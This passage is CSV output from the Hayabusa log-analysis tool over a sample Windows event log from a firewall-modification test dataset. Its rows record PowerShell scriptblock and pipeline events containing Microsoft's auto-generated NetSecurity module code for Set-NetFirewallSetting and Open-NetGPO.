[Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$_",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"_cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and 
$PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"_cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent 
= $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.533 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.535 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.535 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.555 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = 
[System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
